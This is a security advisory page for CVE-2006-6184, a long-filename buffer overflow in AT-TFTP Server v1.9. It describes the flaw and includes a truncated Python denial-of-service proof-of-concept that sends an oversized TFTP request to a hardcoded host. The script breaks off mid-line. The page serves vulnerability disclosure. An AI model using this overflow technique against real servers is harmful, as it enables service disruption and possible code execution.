SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

TFTP Server AT-TFTP Server v 1.9 Buffer Overflow Vulnerability (Long filename)


Arrow  SecurityAlert : 1929
Arrow  CVE : CVE-2006-6184
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : Liu Qixu
Arrow  Published : 01.12.2006

Arrow  Affected Software : TFTP Server AT-TFTP Server v 1.9



Arrow  Advisory Content :  

TFTP Server AT-TFTP Server v 1.9 Buffer Overflow Vulnerability (Long
filename)

------------------------------------------------------------------
SUMMARY:

AT-TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.
(http://www.alliedtelesyn.co.uk/en-gb/support/downloads/tools.asp)
It provides an implementation of the TFTPv2 protocol.

A vulnerability has been identified in TFTP Server AT-TFTP Server v1.9,
which could be exploited by remote or local attackers to execute arbitrary
commands or cause a denial of service. This flaw is due to a buffer
overflow error when handling an overly long file name (more than 227 bytes)
passed to a "GET" or "PUT" command, which could be exploited by malicious
users to compromise a vulnerable system or crash an affected application.
----------
DETAILS:

Vulnerable systems: AT-TFTP Server v 1.9 and probable prior

Exploit:

#!/usr/bin/python
# Buffer Overflow (Long filename) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC

import socket
import sys

host = '192.168.1.11'
port = 69

try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)

filename = "A" * 227
mode = "netascii"
data = "x00x02" + filename + "





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.